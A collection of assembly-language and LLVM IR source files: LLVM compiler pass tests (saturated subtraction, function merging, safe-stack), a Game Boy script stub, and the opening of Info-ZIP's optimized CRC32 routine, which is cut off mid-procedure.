%a59 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 59), align 1
%a60 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 60), align 1
%a61 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 61), align 1
%a62 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 62), align 1
%a63 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 63), align 1
%b0 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 0 ), align 1
%b1 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 1 ), align 1
%b2 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 2 ), align 1
%b3 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 3 ), align 1
%b4 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 4 ), align 1
%b5 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 5 ), align 1
%b6 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 6 ), align 1
%b7 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 7 ), align 1
%b8 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 8 ), align 1
%b9 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 9 ), align 1
%b10 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 10), align 1
%b11 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 11), align 1
%b12 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 12), align 1
%b13 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 13), align 1
%b14 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 14), align 1
%b15 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 15), align 1
%b16 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 16), align 1
%b17 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 17), align 1
%b18 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 18), align 1
%b19 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 19), align 1
%b20 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 20), align 1
%b21 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 21), align 1
%b22 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 22), align 1
%b23 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 23), align 1
%b24 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 24), align 1
%b25 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 25), align 1
%b26 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 26), align 1
%b27 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 27), align 1
%b28 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 28), align 1
%b29 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 29), align 1
%b30 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 30), align 1
%b31 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 31), align 1
%b32 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 32), align 1
%b33 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 33), align 1
%b34 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 34), align 1
%b35 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 35), align 1
%b36 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 36), align 1
%b37 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 37), align 1
%b38 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 38), align 1
%b39 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 39), align 1
%b40 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 40), align 1
%b41 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 41), align 1
%b42 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 42), align 1
%b43 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 43), align 1
%b44 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 44), align 1
%b45 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 45), align 1
%b46 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 46), align 1
%b47 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 47), align 1
%b48 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 48), align 1
%b49 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 49), align 1
%b50 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 50), align 1
%b51 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 51), align 1
%b52 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 52), align 1
%b53 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 53), align 1
%b54 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 54), align 1
%b55 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 55), align 1
%b56 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 56), align 1
%b57 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 57), align 1
%b58 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 58), align 1
%b59 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 59), align 1
%b60 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 60), align 1
%b61 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 61), align 1
%b62 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 62), align 1
%b63 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 63), align 1
%r0 = call i8 @llvm.ssub.sat.i8(i8 %a0 , i8 %b0 )
%r1 = call i8 @llvm.ssub.sat.i8(i8 %a1 , i8 %b1 )
%r2 = call i8 @llvm.ssub.sat.i8(i8 %a2 , i8 %b2 )
%r3 = call i8 @llvm.ssub.sat.i8(i8 %a3 , i8 %b3 )
%r4 = call i8 @llvm.ssub.sat.i8(i8 %a4 , i8 %b4 )
%r5 = call i8 @llvm.ssub.sat.i8(i8 %a5 , i8 %b5 )
%r6 = call i8 @llvm.ssub.sat.i8(i8 %a6 , i8 %b6 )
%r7 = call i8 @llvm.ssub.sat.i8(i8 %a7 , i8 %b7 )
%r8 = call i8 @llvm.ssub.sat.i8(i8 %a8 , i8 %b8 )
%r9 = call i8 @llvm.ssub.sat.i8(i8 %a9 , i8 %b9 )
%r10 = call i8 @llvm.ssub.sat.i8(i8 %a10, i8 %b10)
%r11 = call i8 @llvm.ssub.sat.i8(i8 %a11, i8 %b11)
%r12 = call i8 @llvm.ssub.sat.i8(i8 %a12, i8 %b12)
%r13 = call i8 @llvm.ssub.sat.i8(i8 %a13, i8 %b13)
%r14 = call i8 @llvm.ssub.sat.i8(i8 %a14, i8 %b14)
%r15 = call i8 @llvm.ssub.sat.i8(i8 %a15, i8 %b15)
%r16 = call i8 @llvm.ssub.sat.i8(i8 %a16, i8 %b16)
%r17 = call i8 @llvm.ssub.sat.i8(i8 %a17, i8 %b17)
%r18 = call i8 @llvm.ssub.sat.i8(i8 %a18, i8 %b18)
%r19 = call i8 @llvm.ssub.sat.i8(i8 %a19, i8 %b19)
%r20 = call i8 @llvm.ssub.sat.i8(i8 %a20, i8 %b20)
%r21 = call i8 @llvm.ssub.sat.i8(i8 %a21, i8 %b21)
%r22 = call i8 @llvm.ssub.sat.i8(i8 %a22, i8 %b22)
%r23 = call i8 @llvm.ssub.sat.i8(i8 %a23, i8 %b23)
%r24 = call i8 @llvm.ssub.sat.i8(i8 %a24, i8 %b24)
%r25 = call i8 @llvm.ssub.sat.i8(i8 %a25, i8 %b25)
%r26 = call i8 @llvm.ssub.sat.i8(i8 %a26, i8 %b26)
%r27 = call i8 @llvm.ssub.sat.i8(i8 %a27, i8 %b27)
%r28 = call i8 @llvm.ssub.sat.i8(i8 %a28, i8 %b28)
%r29 = call i8 @llvm.ssub.sat.i8(i8 %a29, i8 %b29)
%r30 = call i8 @llvm.ssub.sat.i8(i8 %a30, i8 %b30)
%r31 = call i8 @llvm.ssub.sat.i8(i8 %a31, i8 %b31)
%r32 = call i8 @llvm.ssub.sat.i8(i8 %a32, i8 %b32)
%r33 = call i8 @llvm.ssub.sat.i8(i8 %a33, i8 %b33)
%r34 = call i8 @llvm.ssub.sat.i8(i8 %a34, i8 %b34)
%r35 = call i8 @llvm.ssub.sat.i8(i8 %a35, i8 %b35)
%r36 = call i8 @llvm.ssub.sat.i8(i8 %a36, i8 %b36)
%r37 = call i8 @llvm.ssub.sat.i8(i8 %a37, i8 %b37)
%r38 = call i8 @llvm.ssub.sat.i8(i8 %a38, i8 %b38)
%r39 = call i8 @llvm.ssub.sat.i8(i8 %a39, i8 %b39)
%r40 = call i8 @llvm.ssub.sat.i8(i8 %a40, i8 %b40)
%r41 = call i8 @llvm.ssub.sat.i8(i8 %a41, i8 %b41)
%r42 = call i8 @llvm.ssub.sat.i8(i8 %a42, i8 %b42)
%r43 = call i8 @llvm.ssub.sat.i8(i8 %a43, i8 %b43)
%r44 = call i8 @llvm.ssub.sat.i8(i8 %a44, i8 %b44)
%r45 = call i8 @llvm.ssub.sat.i8(i8 %a45, i8 %b45)
%r46 = call i8 @llvm.ssub.sat.i8(i8 %a46, i8 %b46)
%r47 = call i8 @llvm.ssub.sat.i8(i8 %a47, i8 %b47)
%r48 = call i8 @llvm.ssub.sat.i8(i8 %a48, i8 %b48)
%r49 = call i8 @llvm.ssub.sat.i8(i8 %a49, i8 %b49)
%r50 = call i8 @llvm.ssub.sat.i8(i8 %a50, i8 %b50)
%r51 = call i8 @llvm.ssub.sat.i8(i8 %a51, i8 %b51)
%r52 = call i8 @llvm.ssub.sat.i8(i8 %a52, i8 %b52)
%r53 = call i8 @llvm.ssub.sat.i8(i8 %a53, i8 %b53)
%r54 = call i8 @llvm.ssub.sat.i8(i8 %a54, i8 %b54)
%r55 = call i8 @llvm.ssub.sat.i8(i8 %a55, i8 %b55)
%r56 = call i8 @llvm.ssub.sat.i8(i8 %a56, i8 %b56)
%r57 = call i8 @llvm.ssub.sat.i8(i8 %a57, i8 %b57)
%r58 = call i8 @llvm.ssub.sat.i8(i8 %a58, i8 %b58)
%r59 = call i8 @llvm.ssub.sat.i8(i8 %a59, i8 %b59)
%r60 = call i8 @llvm.ssub.sat.i8(i8 %a60, i8 %b60)
%r61 = call i8 @llvm.ssub.sat.i8(i8 %a61, i8 %b61)
%r62 = call i8 @llvm.ssub.sat.i8(i8 %a62, i8 %b62)
%r63 = call i8 @llvm.ssub.sat.i8(i8 %a63, i8 %b63)
store i8 %r0 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 0 ), align 1
store i8 %r1 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 1 ), align 1
store i8 %r2 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 2 ), align 1
store i8 %r3 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 3 ), align 1
store i8 %r4 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 4 ), align 1
store i8 %r5 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 5 ), align 1
store i8 %r6 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 6 ), align 1
store i8 %r7 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 7 ), align 1
store i8 %r8 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 8 ), align 1
store i8 %r9 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 9 ), align 1
store i8 %r10, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 10), align 1
store i8 %r11, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 11), align 1
store i8 %r12, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 12), align 1
store i8 %r13, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 13), align 1
store i8 %r14, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 14), align 1
store i8 %r15, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 15), align 1
store i8 %r16, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 16), align 1
store i8 %r17, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 17), align 1
store i8 %r18, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 18), align 1
store i8 %r19, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 19), align 1
store i8 %r20, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 20), align 1
store i8 %r21, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 21), align 1
store i8 %r22, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 22), align 1
store i8 %r23, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 23), align 1
store i8 %r24, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 24), align 1
store i8 %r25, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 25), align 1
store i8 %r26, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 26), align 1
store i8 %r27, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 27), align 1
store i8 %r28, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 28), align 1
store i8 %r29, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 29), align 1
store i8 %r30, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 30), align 1
store i8 %r31, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 31), align 1
store i8 %r32, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 32), align 1
store i8 %r33, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 33), align 1
store i8 %r34, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 34), align 1
store i8 %r35, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 35), align 1
store i8 %r36, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 36), align 1
store i8 %r37, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 37), align 1
store i8 %r38, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 38), align 1
store i8 %r39, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 39), align 1
store i8 %r40, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 40), align 1
store i8 %r41, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 41), align 1
store i8 %r42, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 42), align 1
store i8 %r43, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 43), align 1
store i8 %r44, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 44), align 1
store i8 %r45, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 45), align 1
store i8 %r46, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 46), align 1
store i8 %r47, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 47), align 1
store i8 %r48, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 48), align 1
store i8 %r49, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 49), align 1
store i8 %r50, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 50), align 1
store i8 %r51, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 51), align 1
store i8 %r52, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 52), align 1
store i8 %r53, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 53), align 1
store i8 %r54, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 54), align 1
store i8 %r55, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 55), align 1
store i8 %r56, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 56), align 1
store i8 %r57, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 57), align 1
store i8 %r58, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 58), align 1
store i8 %r59, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 59), align 1
store i8 %r60, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 60), align 1
store i8 %r61, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 61), align 1
store i8 %r62, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 62), align 1
store i8 %r63, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 63), align 1
ret void
}
| {
"language": "Assembly"
} |
; RUN: opt -mergefunc -S < %s | FileCheck %s
; This test makes sure that the mergefunc pass, uses extract and insert value
; to convert the struct result type; as struct types cannot be bitcast.
target datalayout = "e-m:w-p:32:32-i64:64-f80:32-n8:16:32-S32"
%kv1 = type { i32*, i32* }
%kv2 = type { i8*, i8* }
declare void @noop()
define %kv1 @fn1() {
; CHECK-LABEL: @fn1(
%tmp = alloca %kv1
%v1 = getelementptr %kv1, %kv1* %tmp, i32 0, i32 0
store i32* null, i32** %v1
%v2 = getelementptr %kv1, %kv1* %tmp, i32 0, i32 0
store i32* null, i32** %v2
call void @noop()
%v3 = load %kv1, %kv1* %tmp
ret %kv1 %v3
}
define %kv2 @fn2() {
; CHECK-LABEL: @fn2(
; CHECK: %1 = tail call %kv1 @fn1()
; CHECK: %2 = extractvalue %kv1 %1, 0
; CHECK: %3 = bitcast i32* %2 to i8*
; CHECK: %4 = insertvalue %kv2 undef, i8* %3, 0
%tmp = alloca %kv2
%v1 = getelementptr %kv2, %kv2* %tmp, i32 0, i32 0
store i8* null, i8** %v1
%v2 = getelementptr %kv2, %kv2* %tmp, i32 0, i32 0
store i8* null, i8** %v2
call void @noop()
%v3 = load %kv2, %kv2* %tmp
ret %kv2 %v3
}
| {
"language": "Assembly"
} |
INCLUDE "constants.asm"
SECTION "scripts/BaadonRoute2.asm", ROMX
BaadonRoute2_ScriptLoader::
ret
db "@"
| {
"language": "Assembly"
} |
; RUN: opt -safe-stack -S -mtriple=i386-pc-linux-gnu < %s -o - | FileCheck %s
; RUN: opt -safe-stack -S -mtriple=x86_64-pc-linux-gnu < %s -o - | FileCheck %s
%struct.pair = type { i32, i32 }
@.str = private unnamed_addr constant [4 x i8] c"%s\0A\00", align 1
; Addr-of a struct element passed into an invoke instruction.
; (GEP followed by an invoke)
; safestack attribute
; Requires protector.
define i32 @foo() uwtable safestack personality i8* bitcast (i32 (...)* @__gxx_personality_v0 to i8*) {
entry:
; CHECK: __safestack_unsafe_stack_ptr
%c = alloca %struct.pair, align 4
%exn.slot = alloca i8*
%ehselector.slot = alloca i32
%a = getelementptr inbounds %struct.pair, %struct.pair* %c, i32 0, i32 0
store i32 0, i32* %a, align 4
%a1 = getelementptr inbounds %struct.pair, %struct.pair* %c, i32 0, i32 0
invoke void @_Z3exceptPi(i32* %a1)
to label %invoke.cont unwind label %lpad
invoke.cont:
ret i32 0
lpad:
%0 = landingpad { i8*, i32 }
catch i8* null
ret i32 0
}
declare void @_Z3exceptPi(i32*)
declare i32 @__gxx_personality_v0(...)
| {
"language": "Assembly"
} |
;===========================================================================
; Copyright (c) 1990-2007 Info-ZIP. All rights reserved.
;
; See the accompanying file LICENSE, version 2000-Apr-09 or later
; (the contents of which are also included in zip.h) for terms of use.
; If, for some reason, all these files are missing, the Info-ZIP license
; also may be found at: ftp://ftp.info-zip.org/pub/infozip/license.html
;===========================================================================
; crc_i386.asm, optimized CRC calculation function for Zip and UnZip,
; created by Paul Kienitz and Christian Spieler. Last revised 07 Jan 2007.
;
; Revised 06-Oct-96, Scott Field ([email protected])
; fixed to assemble with masm by not using .model directive which makes
; assumptions about segment alignment. Also,
; avoid using loop, and j[e]cxz where possible. Use mov + inc, rather
; than lodsb, and other misc. changes resulting in the following performance
; increases:
;
; unrolled loops NO_UNROLLED_LOOPS
; *8 >8 <8 *8 >8 <8
;
; +54% +42% +35% +82% +52% +25%
;
; first item in each table is input buffer length, even multiple of 8
; second item in each table is input buffer length, > 8
; third item in each table is input buffer length, < 8
;
; Revised 02-Apr-97, Chr. Spieler, based on Rodney Brown ([email protected])
; Incorporated Rodney Brown's 32-bit-reads optimization as found in the
; UNIX AS source crc_i386.S. This new code can be disabled by defining
; the macro symbol NO_32_BIT_LOADS.
;
; Revised 12-Oct-97, Chr. Spieler, based on Rodney Brown ([email protected])
; Incorporated Rodney Brown's additional tweaks for 32-bit-optimized CPUs
; (like the Pentium Pro, Pentium II, and probably some Pentium clones).
; This optimization is controlled by the macro symbol __686 and is disabled
; by default. (This default is based on the assumption that most users
; do not yet work on a Pentium Pro or Pentium II machine ...)
;
; Revised 25-Mar-98, Cosmin Truta ([email protected])
; Working without .model directive caused tasm32 version 5.0 to produce
; bad object code. The optimized alignments can be optionally disabled
; by defining NO_ALIGN, thus allowing to use .model flat. There is no need
; to define this macro if using other versions of tasm.
;
; Revised 16-Jan-2005, Cosmin Truta ([email protected])
; Enabled the 686 build by default, because there are hardly any pre-686 CPUs
; in serious use nowadays. (See the 12-Oct-97 note above.)
;
; Revised 03-Jan-2006, Chr. Spieler
; Enlarged unrolling loops to "do 16 bytes per turn"; optimized access to
; data buffer in loop body (adjust pointer only once in loop body and use
; offsets to access each item); added additional support for the "unfolded
; tables" optimization variant (enabled by IZ_CRCOPTIM_UNFOLDTBL).
;
; Revised 07-Jan-2007, Chr. Spieler
; Recognize additional conditional flag CRC_TABLE_ONLY that prevents
; compilation of the crc32() function.
;
; FLAT memory model assumed.
;
; Loop unrolling can be disabled by defining the macro NO_UNROLLED_LOOPS.
; This results in shorter code at the expense of reduced performance.
;
;==============================================================================
;
; Do NOT assemble this source if external crc32 routine from zlib gets used,
; or only the precomputed CRC_32_Table is needed.
;
IFNDEF USE_ZLIB
IFNDEF CRC_TABLE_ONLY
;
.386p
name crc_i386
IFDEF NO_ALIGN
.model flat
ENDIF
IFNDEF PRE_686
IFNDEF __686
__686 EQU 1 ; optimize for Pentium Pro, Pentium II and compatible CPUs
ENDIF
ENDIF
extrn _get_crc_table:near ; ZCONST ulg near *get_crc_table(void);
;
IFNDEF NO_STD_STACKFRAME
; Use a `standard' stack frame setup on routine entry and exit.
; Actually, this option is set as default, because it results
; in smaller code !!
STD_ENTRY MACRO
push ebp
mov ebp,esp
ENDM
Arg1 EQU 08H[ebp]
Arg2 EQU 0CH[ebp]
Arg3 EQU 10H[ebp]
STD_LEAVE MACRO
pop ebp
ENDM
ELSE ; NO_STD_STACKFRAME
STD_ENTRY MACRO
ENDM
Arg1 EQU 18H[esp]
Arg2 EQU 1CH[esp]
Arg3 EQU 20H[esp]
STD_LEAVE MACRO
ENDM
ENDIF ; ?NO_STD_STACKFRAME
; These two (three) macros make up the loop body of the CRC32 cruncher.
; registers modified:
; eax : crc value "c"
; esi : pointer to next data byte (or dword) "buf++"
; registers read:
; edi : pointer to base of crc_table array
; scratch registers:
; ebx : index into crc_table array
; (requires upper three bytes = 0 when __686 is undefined)
IFNDEF __686 ; optimize for 386, 486, Pentium
Do_CRC MACRO
mov bl,al ; tmp = c & 0xFF
shr eax,8 ; c = (c >> 8)
xor eax,[edi+ebx*4] ; ^ table[tmp]
ENDM
ELSE ; __686 : optimize for Pentium Pro, Pentium II and compatible CPUs
Do_CRC MACRO
movzx ebx,al ; tmp = c & 0xFF
shr eax,8 ; c = (c >> 8)
xor eax,[edi+ebx*4] ; ^ table[tmp]
ENDM
ENDIF ; ?__686
Do_CRC_byte MACRO
xor al, byte ptr [esi] ; c ^= *buf
inc esi ; buf++
Do_CRC ; c = (c >> 8) ^ table[c & 0xFF]
ENDM
Do_CRC_byteof MACRO ofs
xor al, byte ptr [esi+ofs] ; c ^= *(buf+ofs)
Do_CRC ; c = (c >> 8) ^ table[c & 0xFF]
ENDM
IFNDEF NO_32_BIT_LOADS
IFDEF IZ_CRCOPTIM_UNFOLDTBL
; the edx register is needed in crc calculation
SavLen EQU Arg3
UpdCRC_dword MACRO
movzx ebx,al ; tmp = c & 0xFF
mov edx,[edi+ebx*4+3072] ; table[256*3+tmp]
movzx ebx,ah ; tmp = (c>>8) & 0xFF
shr eax,16 ;
xor edx,[edi+ebx*4+2048] ; ^ table[256*2+tmp]
movzx ebx,al ; tmp = (c>>16) & 0xFF
shr eax,8 ; tmp = (c>>24)
xor edx,[edi+ebx*4+1024] ; ^ table[256*1+tmp]
mov eax,[edi+eax*4] ; ^ table[256*0+tmp]
xor eax,edx ; ..
ENDM
UpdCRC_dword_sh MACRO dwPtrIncr
movzx ebx,al ; tmp = c & 0xFF
mov edx,[edi+ebx*4+3072] ; table[256*3+tmp]
movzx ebx,ah ; tmp = (c>>8) & 0xFF
xor edx,[edi+ebx*4+2048] ; ^ table[256*2+tmp]
shr eax,16 ;
movzx ebx,al ; tmp = (c>>16) & 0xFF
add esi, 4*dwPtrIncr ; ((ulg *)buf) += dwPtrIncr
shr eax,8 ; tmp = (c>>24)
xor edx,[edi+ebx*4+1024] ; ^ table[256*1+tmp]
mov eax,[edi+eax*4] ; ^ table[256*0+tmp]
xor eax,edx ; ..
ENDM
ELSE ; IZ_CRCOPTIM_UNFOLDTBL
; the edx register is not needed anywhere else
SavLen EQU edx
UpdCRC_dword MACRO
Do_CRC
Do_CRC
Do_CRC
Do_CRC
ENDM
UpdCRC_dword_sh MACRO dwPtrIncr
Do_CRC
Do_CRC
add esi, 4*dwPtrIncr ; ((ulg *)buf) += dwPtrIncr
Do_CRC
Do_CRC
ENDM
ENDIF ; ?IZ_CRCOPTIM_UNFOLDTBL
Do_CRC_dword MACRO
xor eax, dword ptr [esi] ; c ^= *(ulg *)buf
UpdCRC_dword_sh 1 ; ... ((ulg *)buf)++
ENDM
Do_CRC_4dword MACRO
xor eax, dword ptr [esi] ; c ^= *(ulg *)buf
UpdCRC_dword
xor eax, dword ptr [esi+4] ; c ^= *((ulg *)buf+1)
UpdCRC_dword
xor eax, dword ptr [esi+8] ; c ^= *((ulg *)buf+2)
UpdCRC_dword
xor eax, dword ptr [esi+12] ; c ^= *((ulg *)buf]+3
UpdCRC_dword_sh 4 ; ... ((ulg *)buf)+=4
ENDM
ENDIF ; !NO_32_BIT_LOADS
IFNDEF NO_ALIGN
_TEXT segment use32 para public 'CODE'
ELSE
_TEXT segment use32
ENDIF
assume CS: _TEXT
public _crc32
_crc32 proc near ; ulg crc32(ulg crc, ZCONST uch *buf, extent len)
STD_ENTRY
push edi
push esi
push ebx
push edx
push ecx
mov esi,Arg2 ; 2nd arg: uch *buf
sub eax,eax ;> if (!buf)
test esi,esi ;> return 0;
jz fine ;> else {
call _get_crc_table
mov edi,eax
mov eax,Arg1 ; 1st arg: ulg crc
IFNDEF __686
sub ebx,ebx ; ebx=0; make bl usable as a dword
ENDIF
